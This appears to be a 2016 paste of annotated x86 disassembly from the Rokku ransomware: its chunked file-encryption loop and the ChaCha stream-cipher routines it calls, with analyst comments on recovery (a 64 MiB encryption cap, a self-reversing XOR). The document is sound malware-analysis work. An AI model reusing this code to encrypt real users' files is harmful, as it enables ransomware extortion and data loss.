
Rokku virus encryption loop

a guest
Apr 23rd, 2016
  ; File-encryption loop (32-bit x86, debugger-style listing; the <...> call names are analyst labels).
  ; ebp:edi = 64-bit file offset handled so far.
  ; [esp+30040]/[esp+30044] = low/high dword of a 64-bit limit (presumably the file size; confirm
  ; in the code before this fragment).
  ; ebx is used as the value to compare against and looks like 0.
  ; NOTE(review): ebx is set outside this fragment; confirm.
  ; Each pass reads at most 0x8000 bytes, runs ChaChaEncrypt in place over the buffer at 393EC0
  ; with the cipher context at 39E1E0, and hands the result to WriteCiphertext with the same offset.
  ; Once the offset reaches 0x4000000 the code seeks to the limit and the loop ends, so data past
  ; the first 64 MiB of a file appears to stay unencrypted. This matters for triage and recovery.
  ; Jump targets are annotated by instruction-length count; 364FD7 and 3650DB lie outside the listing.
  1. 364F19: ; loop head, re-entered after every chunk
  2. mov eax,dword ptr ss:[esp+30040] ; eax = limit, low dword
  3. mov ecx,dword ptr ss:[esp+30044] ; ecx = limit, high dword
  4. sub eax,edi ; ecx:eax = limit - offset (bytes remaining)
  5. sbb ecx,ebp
  6. cmp ebp,ebx ; offset high dword against ebx (signed compare)
  7. jl 364F65 ; below the cap: go pick a chunk size
  8. jg 364F39 ; above the cap: finish
  9. cmp edi,4000000 ; high dwords equal: low dword against 0x4000000 (64 MiB)
  10. jb 364F65
  11. mov ebp,dword ptr ss:[esp+30044] ; 364F39: cap reached, offset := limit
  12. xorps xmm0,xmm0
  13. mov edi,dword ptr ss:[esp+30040]
  14. mov ecx,dword ptr ss:[esp+38] ; ecx argument for SeekFilePos (value stored at [esp+38])
  15. push ebp ; 64-bit position, high dword
  16. push edi ; 64-bit position, low dword
  17. movlpd qword ptr ss:[esp+28],xmm0 ; zero the qword that is [esp+20] once the two pushes are popped
  18. call <SeekFilePos>
  19. mov eax,dword ptr ss:[esp+28] ; remaining count, low dword, taken from that qword
  20. pop ecx ; drop the two pushed arguments
  21. pop ecx
  22. mov ecx,dword ptr ss:[esp+24] ; remaining count, high dword; 0 unless SeekFilePos wrote it (TODO confirm)
  23. cmp ecx,ebx ; 364F65: remaining high dword above ebx?
  24. ja 364F7E ; yes: use the full chunk size
  25. cmp eax,ebx ; remaining low dword above ebx?
  26. ja 364F71
  27. mov esi,ebx ; nothing remaining: esi = ebx
  28. jmp 364F94 ; skip the read; the test below then leaves the loop when esi is 0
  29. cmp ecx,ebx ; 364F71: clamp the remaining count to 0x8000
  30. ja 364F7E
  31. jb 364F83
  32. cmp eax,8000
  33. jb 364F83 ; fewer than 0x8000 bytes left: read just those
  34. mov eax,8000 ; 364F7E: chunk size = 0x8000 (32 KiB)
  35. push ebp ; 364F83: offset, high dword
  36. push edi ; offset, low dword
  37. push eax ; byte count to read
  38. lea ecx,dword ptr ss:[esp+44] ; ecx = address of the object at [esp+38] before the three pushes
  39. call <ReadBuffer>
  40. add esp,C ; drop the three arguments
  41. mov esi,eax ; esi = ReadBuffer result, used below as the byte count
  42. test esi,esi ; 364F94
  43. js 3650DB ; negative result: error path
  44. je 364FD7 ; zero bytes: leave the loop
  45. mov eax,393EC0 ; fixed data buffer (presumably filled by ReadBuffer; confirm)
  46. mov ecx,39E1E0 ; cipher context
  47. push esi ; stack arg2 = byte count
  48. push eax ; stack arg1 = output pointer
  49. mov edx,eax ; input pointer = output pointer, so the buffer is encrypted in place
  50. call <ChaChaEncrypt>
  51. push ebp ; offset, high dword (same offset the read used)
  52. push edi ; offset, low dword
  53. push esi ; byte count
  54. mov edx,393EC0 ; buffer that was just encrypted
  55. lea ecx,dword ptr ss:[esp+4C] ; same object as passed to ReadBuffer (five dwords are on the stack here)
  56. call <WriteCiphertext>
  57. add esp,14 ; drops these three arguments and the two left from ChaChaEncrypt
  58. test eax,eax
  59. js 3650DB ; negative result: error path
  60. cdq ; edx:eax = sign-extended WriteCiphertext result
  61. add edi,eax ; offset += result
  62. adc ebp,edx
  63. jmp 364F19
  64.  
  ; Stream XOR routine (analyst label ChaChaEncrypt).
  ; In:  ecx = cipher context, edx = input pointer,
  ;      stack arg1 = output pointer, stack arg2 = byte count.
  ; Context fields used here: +0x00 state handed to ChaChaDblRound, +0x40 64-byte keystream block,
  ;      +0x80 number of keystream bytes in that block not yet consumed.
  ; Ends with a plain ret, so the caller removes the two stack arguments.
  ; Output = input XOR keystream, so the same routine reverses itself when given the same
  ; context state. This is useful to know when assessing recoverability.
  ; Jump targets are annotated by instruction-length count.
  65. 36BBE1: ChaChaEncrypt:
  66. push ecx ; reserves one dword of local space ([esp+10] once all five pushes are done)
  67. push ebp
  68. push esi
  69. mov esi,dword ptr ss:[esp+14] ; esi = byte count (stack arg2)
  70. mov ebp,edx ; ebp = input pointer
  71. push edi
  72. mov edi,ecx ; edi = cipher context
  73. test esi,esi
  74. je 36BC82 ; nothing to do: exit (ebx has not been pushed yet on this path)
  75. mov eax,dword ptr ds:[edi+80] ; eax = unused keystream bytes left from the previous call
  76. lea ecx,dword ptr ds:[edi+40] ; ecx = keystream block
  77. push ebx
  78. mov ebx,dword ptr ss:[esp+18] ; ebx = output pointer (stack arg1)
  79. test eax,eax
  80. je 36BC35 ; no leftover keystream: go straight to block generation
  81. cmp esi,eax
  82. mov edx,eax
  83. cmovb edx,esi ; edx = min(byte count, leftover)
  84. sub ecx,eax
  85. add ecx,40 ; ecx = first unused keystream byte (block + 0x40 - leftover)
  86. lea eax,dword ptr ds:[ecx+edx]
  87. mov esi,eax ; esi = end of the keystream span to use
  88. mov al,byte ptr ds:[ecx] ; 36BC18: byte loop, out = keystream XOR input
  89. xor al,byte ptr ss:[ebp]
  90. mov byte ptr ds:[ebx],al
  91. inc ebx
  92. inc ecx
  93. inc ebp
  94. cmp ecx,esi
  95. jb 36BC18
  96. mov esi,dword ptr ss:[esp+1C] ; reload byte count (stack arg2)
  97. lea ecx,dword ptr ds:[edi+40]
  98. sub dword ptr ds:[edi+80],edx ; leftover -= bytes just used
  99. sub esi,edx ; byte count -= bytes just used
  100. test esi,esi ; 36BC35
  101. je 36BC81
  102. push 40 ; 36BC39: per-block loop; eax = 0x40
  103. pop eax
  104. cmp esi,eax
  105. mov edx,ecx ; edx = keystream block (output of ChaChaDblRound)
  106. mov ecx,edi ; ecx = cipher context (input state)
  107. cmovb eax,esi ; eax = min(0x40, bytes still to process)
  108. mov dword ptr ss:[esp+1C],eax ; stack arg2 slot reused for this block's length
  109. call <ChaChaDblRound>
  110. lea eax,dword ptr ds:[edi+40]
  111. mov ecx,eax ; ecx = start of the fresh keystream block
  112. add eax,dword ptr ss:[esp+1C]
  113. mov dword ptr ss:[esp+10],eax ; end pointer kept in the local slot
  114. mov edx,eax ; edx = end of the span to use
  115. mov al,byte ptr ds:[ecx] ; 36BC5D: byte loop, out = keystream XOR input
  116. xor al,byte ptr ss:[ebp]
  117. mov byte ptr ds:[ebx],al
  118. inc ebx
  119. inc ecx
  120. inc ebp
  121. cmp ecx,edx
  122. jb 36BC5D
  123. push 40
  124. pop eax
  125. sub eax,dword ptr ss:[esp+1C]
  126. lea ecx,dword ptr ds:[edi+40]
  127. mov dword ptr ds:[edi+80],eax ; leftover = 0x40 - bytes used from this block
  128. sub esi,dword ptr ss:[esp+1C] ; bytes still to process
  129. jne 36BC39 ; more data: generate the next block
  130. pop ebx ; 36BC81
  131. pop edi ; 36BC82
  132. pop esi
  133. pop ebp
  134. pop ecx ; releases the local slot
  135. ret
  136.  
  ; Keystream block function. The analyst label is ChaChaDblRound, but the routine produces a whole
  ; 64-byte block rather than a single double round.
  ; In:  ecx = 16-dword cipher state, edx = 64-byte output block.
  ; Steps: copy the state into the output block; run 10 passes of four column and four diagonal
  ; quarter-rounds (rotations by 16, 12, 8 and 7, the ChaCha pattern), i.e. 20 rounds; add the
  ; original state word by word and store the sums byte by byte, low byte first; increment the
  ; counter held in state words 12..15.
  ; Working words while the loop runs (xN = word N of the block):
  ;   x0 = [edx]      x4 = ebx   x5 = ecx   x12 = esi   x14 = edi   x15 = ebp
  ;   x13 = [esp+10]  x11 = [esp+14]  x8 = [esp+18]  x6 = [esp+1C]  x7 = [esp+20]
  ;   x10 = [esp+24]  x1 = [esp+28]   x9 = [esp+2C]  x2 = [esp+30]  x3 = [esp+34]
  ;   [esp+38] = output pointer, [esp+40] = pass counter, [esp+44] = state pointer
  ; Triage note: the rotation set 16/12/8/7 and the carry chain over words 12..15 at the end are
  ; the recognisable features of this routine; no cipher constants are loaded here, they arrive
  ; with the state copied from ecx.
  137. 36B8E2: ChaChaDblRound:
  138. sub esp,38 ; 0x38 bytes of locals
  139. push ebx
  140. push ebp
  141. push esi
  142. push edi
  143. mov ebx,ecx ; ebx = state pointer
  144. mov dword ptr ss:[esp+38],edx ; save output pointer
  145. push 10
  146. pop ecx ; ecx = 0x10 dwords to copy
  147. mov esi,ebx
  148. mov dword ptr ss:[esp+44],ebx ; save state pointer for the final addition
  149. mov edi,edx
  150. rep movsd dword ptr es:[edi],dword ptr ds:[esi] ; output block = copy of the 64-byte state
  151. mov eax,dword ptr ds:[edx+20] ; load working words from the copy (x8 first)
  152. mov ebx,dword ptr ds:[edx+10] ; x4
  153. mov esi,dword ptr ds:[edx+30] ; x12
  154. mov ecx,dword ptr ds:[edx+14] ; x5
  155. mov edi,dword ptr ds:[edx+38] ; x14
  156. mov ebp,dword ptr ds:[edx+3C] ; x15
  157. mov dword ptr ss:[esp+18],eax
  158. mov eax,dword ptr ds:[edx+4] ; x1
  159. mov dword ptr ss:[esp+28],eax
  160. mov eax,dword ptr ds:[edx+34] ; x13
  161. mov dword ptr ss:[esp+10],eax
  162. mov eax,dword ptr ds:[edx+24] ; x9
  163. mov dword ptr ss:[esp+2C],eax
  164. mov eax,dword ptr ds:[edx+18] ; x6
  165. mov dword ptr ss:[esp+1C],eax
  166. mov eax,dword ptr ds:[edx+8] ; x2
  167. mov dword ptr ss:[esp+30],eax
  168. mov eax,dword ptr ds:[edx+28] ; x10
  169. mov dword ptr ss:[esp+24],eax
  170. mov eax,dword ptr ds:[edx+1C] ; x7
  171. mov dword ptr ss:[esp+20],eax
  172. mov eax,dword ptr ds:[edx+C] ; x3
  173. mov dword ptr ss:[esp+34],eax
  174. mov eax,dword ptr ds:[edx+2C] ; x11
  175. push A ; pass count 0xA, fetched by the pop two lines down
  176. mov dword ptr ss:[esp+18],eax ; x11 -> slot that is [esp+14] once the pushed value is popped
  177. pop eax ; eax = 10 passes
  178. add dword ptr ds:[edx],ebx ; 36B954, loop top. Column quarter-round (x0,x4,x8,x12): x0 += x4
  179. dec eax ; one pass fewer to go
  180. xor esi,dword ptr ds:[edx] ; x12 ^= x0
  181. mov dword ptr ss:[esp+40],eax ; save pass counter
  182. mov eax,dword ptr ss:[esp+18]
  183. rol esi,10 ; rotate left 16
  184. add eax,esi ; x8 += x12
  185. mov dword ptr ss:[esp+18],eax
  186. xor eax,ebx ; x4 ^= x8 (held in eax for now)
  187. mov ebx,dword ptr ss:[esp+18]
  188. rol eax,C ; rotate left 12
  189. add dword ptr ds:[edx],eax ; x0 += x4
  190. xor esi,dword ptr ds:[edx]
  191. mov edx,dword ptr ss:[esp+2C]
  192. rol esi,8 ; rotate left 8
  193. add ebx,esi
  194. mov dword ptr ss:[esp+18],ebx
  195. xor ebx,eax
  196. mov eax,dword ptr ss:[esp+28] ; column quarter-round (x1,x5,x9,x13) starts here, interleaved
  197. add eax,ecx
  198. rol ebx,7 ; rotate left 7: x4 finished for this quarter-round
  199. mov dword ptr ss:[esp+28],eax
  200. xor eax,dword ptr ss:[esp+10]
  201. rol eax,10
  202. add edx,eax
  203. xor ecx,edx
  204. mov dword ptr ss:[esp+2C],edx
  205. mov edx,dword ptr ss:[esp+28]
  206. rol ecx,C
  207. add edx,ecx
  208. mov dword ptr ss:[esp+10],edx
  209. xor dword ptr ss:[esp+10],eax
  210. mov eax,dword ptr ss:[esp+10]
  211. mov dword ptr ss:[esp+28],edx
  212. mov edx,dword ptr ss:[esp+2C]
  213. rol eax,8
  214. add edx,eax
  215. mov dword ptr ss:[esp+10],eax
  216. mov eax,dword ptr ss:[esp+24]
  217. xor ecx,edx
  218. mov dword ptr ss:[esp+2C],edx
  219. mov edx,dword ptr ss:[esp+30] ; column quarter-round (x2,x6,x10,x14)
  220. add edx,dword ptr ss:[esp+1C]
  221. xor edi,edx
  222. rol ecx,7 ; x5 finished
  223. rol edi,10
  224. add eax,edi
  225. mov dword ptr ss:[esp+24],eax
  226. xor eax,dword ptr ss:[esp+1C]
  227. rol eax,C
  228. add edx,eax
  229. xor edi,edx
  230. mov dword ptr ss:[esp+30],edx
  231. mov edx,dword ptr ss:[esp+24]
  232. rol edi,8
  233. add edx,edi
  234. mov dword ptr ss:[esp+1C],edx
  235. xor dword ptr ss:[esp+1C],eax
  236. mov eax,dword ptr ss:[esp+20] ; column quarter-round (x3,x7,x11,x15)
  237. mov dword ptr ss:[esp+24],edx
  238. mov edx,dword ptr ss:[esp+34]
  239. add edx,eax
  240. rol dword ptr ss:[esp+1C],7 ; x6 finished
  241. xor ebp,edx
  242. rol ebp,10
  243. add dword ptr ss:[esp+14],ebp
  244. xor eax,dword ptr ss:[esp+14]
  245. rol eax,C
  246. add edx,eax
  247. xor ebp,edx
  248. mov dword ptr ss:[esp+34],edx
  249. mov edx,dword ptr ss:[esp+14]
  250. rol ebp,8
  251. add edx,ebp
  252. xor eax,edx
  253. mov dword ptr ss:[esp+14],edx
  254. mov edx,dword ptr ss:[esp+38] ; edx = output pointer again (x0 lives there)
  255. rol eax,7
  256. mov dword ptr ss:[esp+20],eax ; x7 finished
  257. add dword ptr ds:[edx],ecx ; diagonal quarter-round (x0,x5,x10,x15): x0 += x5
  258. xor ebp,dword ptr ds:[edx]
  259. mov eax,dword ptr ss:[esp+24]
  260. rol ebp,10
  261. add eax,ebp
  262. mov dword ptr ss:[esp+24],eax
  263. xor eax,ecx
  264. mov ecx,eax
  265. mov dword ptr ss:[esp+3C],eax ; scratch store; not read again in this listing
  266. mov eax,dword ptr ss:[esp+24]
  267. rol ecx,C
  268. add dword ptr ds:[edx],ecx
  269. xor ebp,dword ptr ds:[edx]
  270. mov edx,dword ptr ss:[esp+28] ; diagonal quarter-round (x1,x6,x11,x12)
  271. rol ebp,8
  272. add eax,ebp
  273. xor ecx,eax
  274. mov dword ptr ss:[esp+24],eax
  275. mov eax,dword ptr ss:[esp+1C]
  276. add edx,eax
  277. xor esi,edx
  278. rol ecx,7 ; x5 finished
  279. rol esi,10
  280. add dword ptr ss:[esp+14],esi
  281. xor eax,dword ptr ss:[esp+14]
  282. rol eax,C
  283. add edx,eax
  284. xor esi,edx
  285. mov dword ptr ss:[esp+28],edx
  286. mov edx,dword ptr ss:[esp+14]
  287. rol esi,8
  288. add edx,esi
  289. xor eax,edx
  290. mov dword ptr ss:[esp+14],edx
  291. mov edx,dword ptr ss:[esp+30] ; diagonal quarter-round (x2,x7,x8,x13)
  292. add edx,dword ptr ss:[esp+20]
  293. rol eax,7
  294. mov dword ptr ss:[esp+1C],eax ; x6 finished
  295. mov eax,dword ptr ss:[esp+10]
  296. xor eax,edx
  297. rol eax,10
  298. add dword ptr ss:[esp+18],eax
  299. mov dword ptr ss:[esp+10],eax
  300. mov eax,dword ptr ss:[esp+18]
  301. xor eax,dword ptr ss:[esp+20]
  302. rol eax,C
  303. add edx,eax
  304. xor dword ptr ss:[esp+10],edx
  305. rol dword ptr ss:[esp+10],8
  306. mov dword ptr ss:[esp+30],edx
  307. mov edx,dword ptr ss:[esp+18]
  308. add edx,dword ptr ss:[esp+10]
  309. mov dword ptr ss:[esp+20],edx
  310. xor dword ptr ss:[esp+20],eax
  311. mov eax,dword ptr ss:[esp+2C]
  312. rol dword ptr ss:[esp+20],7 ; x7 finished
  313. mov dword ptr ss:[esp+18],edx
  314. mov edx,dword ptr ss:[esp+34] ; diagonal quarter-round (x3,x4,x9,x14)
  315. add edx,ebx
  316. xor edi,edx
  317. rol edi,10
  318. add eax,edi
  319. xor ebx,eax
  320. rol ebx,C
  321. add edx,ebx
  322. xor edi,edx
  323. mov dword ptr ss:[esp+34],edx
  324. mov edx,dword ptr ss:[esp+38] ; edx = output pointer, as the loop top expects
  325. rol edi,8
  326. add eax,edi
  327. xor ebx,eax
  328. mov dword ptr ss:[esp+2C],eax
  329. mov eax,dword ptr ss:[esp+40] ; pass counter
  330. rol ebx,7 ; x4 finished
  331. test eax,eax
  332. jne 36B954 ; repeat until all 10 passes are done
  333. mov eax,dword ptr ss:[esp+18] ; write the working words back into the output block
  334. mov dword ptr ds:[edx+20],eax
  335. mov eax,dword ptr ss:[esp+28]
  336. mov dword ptr ds:[edx+4],eax
  337. mov eax,dword ptr ss:[esp+10]
  338. mov dword ptr ds:[edx+34],eax
  339. mov eax,dword ptr ss:[esp+2C]
  340. mov dword ptr ds:[edx+24],eax
  341. mov eax,dword ptr ss:[esp+1C]
  342. mov dword ptr ds:[edx+18],eax
  343. mov eax,dword ptr ss:[esp+30]
  344. mov dword ptr ds:[edx+8],eax
  345. mov eax,dword ptr ss:[esp+24]
  346. mov dword ptr ds:[edx+28],eax
  347. mov eax,dword ptr ss:[esp+20]
  348. mov dword ptr ds:[edx+1C],eax
  349. mov eax,dword ptr ss:[esp+34]
  350. mov dword ptr ds:[edx+C],eax
  351. mov eax,dword ptr ss:[esp+14]
  352. mov dword ptr ds:[edx+30],esi
  353. xor esi,esi ; esi = word index for the addition loop
  354. mov dword ptr ds:[edx+10],ebx
  355. mov ebx,dword ptr ss:[esp+44] ; ebx = original state pointer
  356. mov dword ptr ds:[edx+14],ecx
  357. mov dword ptr ds:[edx+38],edi
  358. mov dword ptr ds:[edx+3C],ebp
  359. mov dword ptr ds:[edx+2C],eax
  360. add edx,2 ; bias the pointer so the byte stores below use offsets -2..+1
  361. mov ecx,dword ptr ds:[ebx+esi*4] ; presumably 36BB9D, loop top: ecx = state word ...
  362. add ecx,dword ptr ds:[edx-2] ; ... plus the matching working word
  363. mov eax,ecx
  364. mov byte ptr ds:[edx-2],cl ; store the sum byte by byte, lowest byte first
  365. shr eax,8
  366. mov byte ptr ds:[edx-1],al
  367. mov eax,ecx
  368. shr eax,10
  369. shr ecx,18
  370. inc esi
  371. mov byte ptr ds:[edx],al
  372. lea edx,dword ptr ds:[edx+4] ; advance to the next word
  373. mov byte ptr ds:[edx-3],cl ; highest byte of the word just left
  374. cmp esi,10
  375. jl 36BB9D ; all 16 words
  376. add dword ptr ds:[ebx+30],1 ; increment state word 12
  377. jne 36BBD9 ; no wrap to zero: done
  378. add dword ptr ds:[ebx+34],1 ; carry into word 13
  379. jne 36BBD9
  380. add dword ptr ds:[ebx+38],1 ; carry into word 14
  381. jne 36BBD9
  382. inc dword ptr ds:[ebx+3C] ; carry into word 15
  383. pop edi ; presumably 36BBD9: common exit
  384. pop esi
  385. pop ebp
  386. pop ebx
  387. add esp,38
  388. ret